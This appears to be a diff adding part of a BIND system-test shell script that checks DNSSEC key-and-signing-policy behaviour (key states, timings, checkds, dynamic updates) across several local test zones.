+set_keystate "KEY1" "STATE_DS" "hidden" +check_key "KEY1" "$id" +test "$ret" -eq 0 && key_save KEY1 +set_keytime "KEY1" "PUBLISHED" "${now}" +check_keytimes +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that 'dnssec-settime -s' also unsets publish time metadata and states in key state file ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +$SETTIME -s -P "none" -g "none" -k "none" "$now" -z "none" "$now" -r "none" "$now" -d "none" "$now" "$BASE_FILE" > /dev/null || log_error "settime failed" +set_keystate "KEY1" "GOAL" "none" +set_keystate "KEY1" "STATE_DNSKEY" "none" +set_keystate "KEY1" "STATE_KRRSIG" "none" +set_keystate "KEY1" "STATE_ZRRSIG" "none" +set_keystate "KEY1" "STATE_DS" "none" +check_key "KEY1" "$id" +test "$ret" -eq 0 && key_save KEY1 +set_keytime "KEY1" "PUBLISHED" "none" +check_keytimes +test "$ret" -eq 0 || 
echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that 'dnssec-settime -s' also sets active time metadata and states in key state file (uppercase) ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +now=$(date +%Y%m%d%H%M%S) +$SETTIME -s -A "$now" -g "HIDDEN" -k "UNRETENTIVE" "$now" -z "UNRETENTIVE" "$now" -r "OMNIPRESENT" "$now" -d "OMNIPRESENT" "$now" "$BASE_FILE" > /dev/null || log_error "settime failed" +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "omnipresent" +check_key "KEY1" "$id" +test "$ret" -eq 0 && key_save KEY1 +set_keytime "KEY1" "ACTIVE" "${now}" +check_keytimes +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# named +# + +# The NSEC record at the apex of the zone and its RRSIG records are +# added as part of the last step in signing a zone. We wait for the +# NSEC records to appear before proceeding with a counter to prevent +# infinite loops if there is an error. +n=$((n+1)) +echo_i "waiting for kasp signing changes to take effect ($n)" + +_wait_for_done_apexnsec() { + while read -r zone + do + dig_with_opts "$zone" @10.53.0.3 nsec > "dig.out.ns3.test$n.$zone" || return 1 + grep "NS SOA" "dig.out.ns3.test$n.$zone" > /dev/null || return 1 + grep "$zone\..*IN.*RRSIG" "dig.out.ns3.test$n.$zone" > /dev/null || return 1 + done < ns3/zones + + while read -r zone + do + dig_with_opts "$zone" @10.53.0.6 nsec > "dig.out.ns6.test$n.$zone" || return 1 + grep "NS SOA" "dig.out.ns6.test$n.$zone" > /dev/null || return 1 + grep "$zone\..*IN.*RRSIG" "dig.out.ns6.test$n.$zone" > /dev/null || return 1 + done < ns6/zones + + return 0 +} +retry_quiet 30 _wait_for_done_apexnsec || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Test max-zone-ttl rejects zones with too high TTL. 
+n=$((n+1)) +echo_i "check that max-zone-ttl rejects zones with too high TTL ($n)" +ret=0 +set_zone "max-zone-ttl.kasp" +grep "loading from master file ${ZONE}.db failed: out of range" "ns3/named.run" > /dev/null || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: default.kasp. +# +set_keytimes_csk_policy() { + # The first key is immediately published and activated. + created=$(key_get KEY1 CREATED) + set_keytime "KEY1" "PUBLISHED" "${created}" + set_keytime "KEY1" "ACTIVE" "${created}" + # The DS can be published if the DNSKEY and RRSIG records are + # OMNIPRESENT. This happens after max-zone-ttl (1d) plus + # publish-safety (1h) plus zone-propagation-delay (300s) = + # 86400 + 3600 + 300 = 90300. + set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" 90300 + # Key lifetime is unlimited, so not setting RETIRED and REMOVED. +} + +# Check the zone with default kasp policy has loaded and is signed. +set_zone "default.kasp" +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Trigger a keymgr run. Make sure the key files are not touched if there are +# no modifications to the key metadata. 
+n=$((n+1)) +echo_i "make sure key files are untouched if metadata does not change ($n)" +ret=0 +basefile=$(key_get KEY1 BASEFILE) +privkey_stat=$(key_get KEY1 PRIVKEY_STAT) +pubkey_stat=$(key_get KEY1 PUBKEY_STAT) +state_stat=$(key_get KEY1 STATE_STAT) + +nextpart $DIR/named.run > /dev/null +rndccmd 10.53.0.3 loadkeys "$ZONE" > /dev/null || log_error "rndc loadkeys zone ${ZONE} failed" +wait_for_log 3 "keymgr: $ZONE done" $DIR/named.run +privkey_stat2=$(key_stat "${basefile}.private") +pubkey_stat2=$(key_stat "${basefile}.key") +state_stat2=$(key_stat "${basefile}.state") +test "$privkey_stat" = "$privkey_stat2" || log_error "wrong private key file stat (expected $privkey_stat got $privkey_stat2)" +test "$pubkey_stat" = "$pubkey_stat2" || log_error "wrong public key file stat (expected $pubkey_stat got $pubkey_stat2)" +test "$state_stat" = "$state_stat2" || log_error "wrong state file stat (expected $state_stat got $state_stat2)" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "again ($n)" +ret=0 + +nextpart $DIR/named.run > /dev/null +rndccmd 10.53.0.3 loadkeys "$ZONE" > /dev/null || log_error "rndc loadkeys zone ${ZONE} failed" +wait_for_log 3 "keymgr: $ZONE done" $DIR/named.run +privkey_stat2=$(key_stat "${basefile}.private") +pubkey_stat2=$(key_stat "${basefile}.key") +state_stat2=$(key_stat "${basefile}.state") +test "$privkey_stat" = "$privkey_stat2" || log_error "wrong private key file stat (expected $privkey_stat got $privkey_stat2)" +test "$pubkey_stat" = "$pubkey_stat2" || log_error "wrong public key file stat (expected $pubkey_stat got $pubkey_stat2)" +test "$state_stat" = "$state_stat2" || log_error "wrong state file stat (expected $state_stat got $state_stat2)" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update zone. 
+n=$((n+1)) +echo_i "modify unsigned zone file and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +cp "${DIR}/template2.db.in" "${DIR}/${ZONE}.db" +rndccmd 10.53.0.3 reload "$ZONE" > /dev/null || log_error "rndc reload zone ${ZONE} failed" + +update_is_signed() { + ip_a=$1 + ip_d=$2 + + if [ "$ip_a" != "-" ]; then + dig_with_opts "a.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n.a" || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n.a" > /dev/null || return 1 + grep "a.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*${ip_a}" "dig.out.$DIR.test$n.a" > /dev/null || return 1 + lines=$(get_keys_which_signed A "dig.out.$DIR.test$n.a" | wc -l) + test "$lines" -eq 1 || return 1 + get_keys_which_signed A "dig.out.$DIR.test$n.a" | grep "^${KEY_ID}$" > /dev/null || return 1 + fi + + if [ "$ip_d" != "-" ]; then + dig_with_opts "d.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n".d || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n".d > /dev/null || return 1 + grep "d.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*${ip_d}" "dig.out.$DIR.test$n".d > /dev/null || return 1 + lines=$(get_keys_which_signed A "dig.out.$DIR.test$n".d | wc -l) + test "$lines" -eq 1 || return 1 + get_keys_which_signed A "dig.out.$DIR.test$n".d | grep "^${KEY_ID}$" > /dev/null || return 1 + fi +} + +retry_quiet 10 update_is_signed "10.0.0.11" "10.0.0.44" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Move the private key file, a rekey event should not introduce replacement +# keys. +ret=0 +echo_i "test that if private key files are inaccessible this doesn't trigger a rollover ($n)" +basefile=$(key_get KEY1 BASEFILE) +mv "${basefile}.private" "${basefile}.offline" +rndccmd 10.53.0.3 loadkeys "$ZONE" > /dev/null || log_error "rndc loadkeys zone ${ZONE} failed" +wait_for_log 3 "offline, policy default" $DIR/named.run || ret=1 +mv "${basefile}.offline" "${basefile}.private" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Nothing has changed. 
+check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: dynamic.kasp +# +set_zone "dynamic.kasp" +set_dynamic +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Update zone with nsupdate. +n=$((n+1)) +echo_i "nsupdate zone and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +( +echo zone ${ZONE} +echo server 10.53.0.3 "$PORT" +echo update del "a.${ZONE}" 300 A 10.0.0.1 +echo update add "a.${ZONE}" 300 A 10.0.0.101 +echo update add "d.${ZONE}" 300 A 10.0.0.4 +echo send +) | $NSUPDATE + +retry_quiet 10 update_is_signed "10.0.0.101" "10.0.0.4" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update zone with nsupdate (reverting the above change). +n=$((n+1)) +echo_i "nsupdate zone and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +( +echo zone ${ZONE} +echo server 10.53.0.3 "$PORT" +echo update add "a.${ZONE}" 300 A 10.0.0.1 +echo update del "a.${ZONE}" 300 A 10.0.0.101 +echo update del "d.${ZONE}" 300 A 10.0.0.4 +echo send +) | $NSUPDATE + +retry_quiet 10 update_is_signed "10.0.0.1" "-" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update zone with freeze/thaw. +n=$((n+1)) +echo_i "modify zone file and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +rndccmd 10.53.0.3 freeze "$ZONE" > /dev/null || log_error "rndc freeze zone ${ZONE} failed" +sleep 1 +echo "d.${ZONE}. 
300 A 10.0.0.44" >> "${DIR}/${ZONE}.db" +rndccmd 10.53.0.3 thaw "$ZONE" > /dev/null || log_error "rndc thaw zone ${ZONE} failed" + +retry_quiet 10 update_is_signed "10.0.0.1" "10.0.0.44" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: dynamic-inline-signing.kasp +# +set_zone "dynamic-inline-signing.kasp" +set_dynamic +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Update zone with freeze/thaw. +n=$((n+1)) +echo_i "modify unsigned zone file and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +rndccmd 10.53.0.3 freeze "$ZONE" > /dev/null || log_error "rndc freeze zone ${ZONE} failed" +sleep 1 +cp "${DIR}/template2.db.in" "${DIR}/${ZONE}.db" +rndccmd 10.53.0.3 thaw "$ZONE" > /dev/null || log_error "rndc thaw zone ${ZONE} failed" + +retry_quiet 10 update_is_signed || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: inline-signing.kasp +# +set_zone "inline-signing.kasp" +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: checkds-ksk.kasp. +# +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +set_zone "checkds-ksk.kasp" +set_policy "checkds-ksk" "2" "303" +set_server "ns3" "10.53.0.3" +# Key properties. 
+set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +basefile=$(key_get KEY1 BASEFILE) + +_wait_for_metadata() { + _expr=$1 + _file=$2 + grep "$_expr" $_file > /dev/null || return 1 + return 0 +} + +n=$((n+1)) +echo_i "checkds publish correctly sets DSPublish for zone $ZONE ($n)" +now=$(date +%Y%m%d%H%M%S) +rndc_checkds "$SERVER" "$DIR" "-" "$now" "published" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSPublish: $now" "${basefile}.state" || log_error "bad DSPublish in ${basefile}.state" +# DS State should be forced into RUMOURED. +set_keystate "KEY1" "STATE_DS" "rumoured" +check_keys +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdraw correctly sets DSRemoved for zone $ZONE ($n)" +now=$(date +%Y%m%d%H%M%S) +rndc_checkds "$SERVER" "$DIR" "-" "$now" "withdrawn" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSRemoved: $now" "${basefile}.state" || log_error "bad DSRemoved in ${basefile}.state" +# DS State should be forced into UNRETENTIVE. +set_keystate "KEY1" "STATE_DS" "unretentive" +check_keys +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: checkds-doubleksk.kasp. 
+# +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +set_zone "checkds-doubleksk.kasp" +set_policy "checkds-doubleksk" "3" "303" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +set_keyrole "KEY2" "ksk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "no" + +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_KRRSIG" "rumoured" +set_keystate "KEY2" "STATE_DS" "hidden" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_ZRRSIG" "rumoured" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +basefile1=$(key_get KEY1 BASEFILE) +basefile2=$(key_get KEY2 BASEFILE) + +n=$((n+1)) +echo_i "checkds published does not set DSPublish for zone $ZONE (multiple KSK) ($n)" +rndc_checkds "$SERVER" "$DIR" "-" "20200102121314" "published" "$ZONE" +grep "DSPublish:" "${basefile1}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile1}" +grep "DSPublish:" "${basefile2}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdrawn does not set DSRemoved for zone $ZONE (multiple KSK) ($n)" 
+rndc_checkds "$SERVER" "$DIR" "-" "20190102121314" "withdrawn" "$ZONE" +grep "DSRemoved:" "${basefile1}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile1}" +grep "DSRemoved:" "${basefile2}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds published does not set DSPublish for zone $ZONE (wrong algorithm) ($n)" +rndccmd "$SERVER" dnssec -checkds -key $(key_get KEY1 ID) -alg 8 "published" "$ZONE" > rndc.dnssec.checkds.out.$ZONE.$n +grep "DSPublish:" "${basefile1}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile1}" +grep "DSPublish:" "${basefile2}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdrawn does not set DSRemoved for zone $ZONE (wrong algorithm) ($n)" +rndccmd "$SERVER" dnssec -checkds -key $(key_get KEY1 ID) -alg RSASHA256 "withdrawn" "$ZONE" > rndc.dnssec.checkds.out.$ZONE.$n +grep "DSRemoved:" "${basefile1}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile1}" +grep "DSRemoved:" "${basefile2}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds published -key correctly sets DSPublish for key $(key_get KEY1 ID) zone $ZONE (multiple KSK) ($n)" +rndc_checkds "$SERVER" "$DIR" KEY1 "20190102121314" "published" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSPublish: 20190102121314" "${basefile1}.state" || log_error "bad DSPublish in ${basefile1}.state" +grep "DSPublish:" "${basefile2}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdrawn -key correctly sets DSRemoved for key $(key_get KEY2 ID) zone $ZONE (multiple KSK) 
($n)" +rndc_checkds "$SERVER" "$DIR" KEY2 "20200102121314" "withdrawn" "$ZONE" +grep "DSRemoved:" "${basefile1}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile1}" +retry_quiet 3 _wait_for_metadata "DSRemoved: 20200102121314" "${basefile2}.state" || log_error "bad DSRemoved in ${basefile2}.state" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: checkds-csk.kasp. +# +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +set_zone "checkds-csk.kasp" +set_policy "checkds-csk" "1" "303" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +basefile=$(key_get KEY1 BASEFILE) + +n=$((n+1)) +echo_i "checkds publish correctly sets DSPublish for zone $ZONE ($n)" +rndc_checkds "$SERVER" "$DIR" "-" "20190102121314" "published" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSPublish: 20190102121314" "${basefile}.state" || log_error "bad DSPublish in ${basefile}.state" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdraw correctly sets DSRemoved for zone $ZONE ($n)" +rndc_checkds "$SERVER" "$DIR" "-" "20200102121314" "withdrawn" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSRemoved: 20200102121314" "${basefile}.state" || log_error "bad DSRemoved in ${basefile}.state" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Set keytimes for dnssec-policy with various algorithms. 
+# These all use the same time values. +set_keytimes_algorithm_policy() { + # The first KSK is immediately published and activated. + created=$(key_get KEY1 CREATED) + set_keytime "KEY1" "PUBLISHED" "${created}" + set_keytime "KEY1" "ACTIVE" "${created}" + # Key was pregenerated. + if [ "$1" = "pregenerated" ]; then + keyfile=$(key_get KEY1 BASEFILE) + grep "; Publish:" "${keyfile}.key" > published.test${n}.key1 + published=$(awk '{print $3}' < published.test${n}.key1) + set_keytime "KEY1" "PUBLISHED" "${published}" + set_keytime "KEY1" "ACTIVE" "${published}" + fi + published=$(key_get KEY1 PUBLISHED) + + # The DS can be published if the DNSKEY and RRSIG records are + # OMNIPRESENT. This happens after max-zone-ttl (1d) plus + # publish-safety (1h) plus zone-propagation-delay (300s) = + # 86400 + 3600 + 300 = 90300. + set_addkeytime "KEY1" "SYNCPUBLISH" "${published}" 90300 + # Key lifetime is 10 years, 315360000 seconds. + set_addkeytime "KEY1" "RETIRED" "${published}" 315360000 + # The key is removed after the retire time plus DS TTL (1d), + # parent propagation delay (1h), and retire safety (1h) = + # 86400 + 3600 + 3600 = 93600. + retired=$(key_get KEY1 RETIRED) + set_addkeytime "KEY1" "REMOVED" "${retired}" 93600 + + # The first ZSKs are immediately published and activated. + created=$(key_get KEY2 CREATED) + set_keytime "KEY2" "PUBLISHED" "${created}" + set_keytime "KEY2" "ACTIVE" "${created}" + # Key was pregenerated. + if [ "$1" = "pregenerated" ]; then + keyfile=$(key_get KEY2 BASEFILE) + grep "; Publish:" "${keyfile}.key" > published.test${n}.key2 + published=$(awk '{print $3}' < published.test${n}.key2) + set_keytime "KEY2" "PUBLISHED" "${published}" + set_keytime "KEY2" "ACTIVE" "${published}" + fi + published=$(key_get KEY2 PUBLISHED) + + # Key lifetime for KSK2 is 5 years, 157680000 seconds. 
+ set_addkeytime "KEY2" "RETIRED" "${published}" 157680000 + # The key is removed after the retire time plus max zone ttl (1d), zone + # propagation delay (300s), retire safety (1h), and sign delay + # (signature validity minus refresh, 9d) = + # 86400 + 300 + 3600 + 777600 = 867900. + retired=$(key_get KEY2 RETIRED) + set_addkeytime "KEY2" "REMOVED" "${retired}" 867900 + + # Second ZSK (KEY3). + created=$(key_get KEY3 CREATED) + set_keytime "KEY3" "PUBLISHED" "${created}" + set_keytime "KEY3" "ACTIVE" "${created}" + # Key was pregenerated. + if [ "$1" = "pregenerated" ]; then + keyfile=$(key_get KEY3 BASEFILE) + grep "; Publish:" "${keyfile}.key" > published.test${n}.key3 + published=$(awk '{print $3}' < published.test${n}.key3) + set_keytime "KEY3" "PUBLISHED" "${published}" + set_keytime "KEY3" "ACTIVE" "${published}" + fi + published=$(key_get KEY3 PUBLISHED) + + # Key lifetime for KSK3 is 1 year, 31536000 seconds. + set_addkeytime "KEY3" "RETIRED" "${published}" 31536000 + retired=$(key_get KEY3 RETIRED) + set_addkeytime "KEY3" "REMOVED" "${retired}" 867900 +} + +# +# Zone: rsasha1.kasp. +# +if $SHELL ../testcrypto.sh -q RSASHA1 +then + set_zone "rsasha1.kasp" + set_policy "rsasha1" "3" "1234" + set_server "ns3" "10.53.0.3" + # Key properties. + key_clear "KEY1" + set_keyrole "KEY1" "ksk" + set_keylifetime "KEY1" "315360000" + set_keyalgorithm "KEY1" "5" "RSASHA1" "2048" + set_keysigning "KEY1" "yes" + set_zonesigning "KEY1" "no" + + key_clear "KEY2" + set_keyrole "KEY2" "zsk" + set_keylifetime "KEY2" "157680000" + set_keyalgorithm "KEY2" "5" "RSASHA1" "2048" + set_keysigning "KEY2" "no" + set_zonesigning "KEY2" "yes" + + key_clear "KEY3" + set_keyrole "KEY3" "zsk" + set_keylifetime "KEY3" "31536000" + set_keyalgorithm "KEY3" "5" "RSASHA1" "2000" + set_keysigning "KEY3" "no" + set_zonesigning "KEY3" "yes" + + # KSK: DNSKEY, RRSIG (ksk) published. DS needs to wait. + # ZSK: DNSKEY, RRSIG (zsk) published. 
+ set_keystate "KEY1" "GOAL" "omnipresent"
+ set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+ set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+ set_keystate "KEY1" "STATE_DS" "hidden"
+
+ set_keystate "KEY2" "GOAL" "omnipresent"
+ set_keystate "KEY2" "STATE_DNSKEY" "rumoured"
+ set_keystate "KEY2" "STATE_ZRRSIG" "rumoured"
+
+ set_keystate "KEY3" "GOAL" "omnipresent"
+ set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+ set_keystate "KEY3" "STATE_ZRRSIG" "rumoured"
+ # Three keys only.
+ key_clear "KEY4"
+
+ check_keys
+ check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+ set_keytimes_algorithm_policy
+ check_keytimes
+ check_apex
+ check_subdomain
+ dnssec_verify
+fi
+
+#
+# Zone: unsigned.kasp.
+#
+set_zone "unsigned.kasp"
+set_policy "none" "0" "0"
+set_server "ns3" "10.53.0.3"
+
+key_clear "KEY1"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+# Make sure the zone file is untouched.
+n=$((n+1))
+echo_i "Make sure the zonefile for zone ${ZONE} is not edited ($n)"
+ret=0
+diff "${DIR}/${ZONE}.db.infile" "${DIR}/${ZONE}.db" || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+#
+# Zone: insecure.kasp.
+#
+set_zone "insecure.kasp"
+set_policy "insecure" "0" "0"
+set_server "ns3" "10.53.0.3"
+
+key_clear "KEY1"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+
+#
+# Zone: unlimited.kasp.
+#
+set_zone "unlimited.kasp"
+set_policy "unlimited" "1" "1234"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_ZRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_DS" "hidden"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+set_keytimes_csk_policy
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone: inherit.kasp.
+#
+set_zone "inherit.kasp"
+set_policy "rsasha256" "3" "1234"
+set_server "ns3" "10.53.0.3"
+
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "315360000"
+set_keyalgorithm "KEY1" "8" "RSASHA256" "2048"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+key_clear "KEY2"
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "157680000"
+set_keyalgorithm "KEY2" "8" "RSASHA256" "2048"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+
+key_clear "KEY3"
+set_keyrole "KEY3" "zsk"
+set_keylifetime "KEY3" "31536000"
+set_keyalgorithm "KEY3" "8" "RSASHA256" "3072"
+set_keysigning "KEY3" "no"
+set_zonesigning "KEY3" "yes"
+# KSK: DNSKEY, RRSIG (ksk) published. DS needs to wait.
+# ZSK: DNSKEY, RRSIG (zsk) published.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_DS" "hidden"
+
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY2" "STATE_ZRRSIG" "rumoured"
+
+set_keystate "KEY3" "GOAL" "omnipresent"
+set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY3" "STATE_ZRRSIG" "rumoured"
+# Three keys only.
+key_clear "KEY4"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
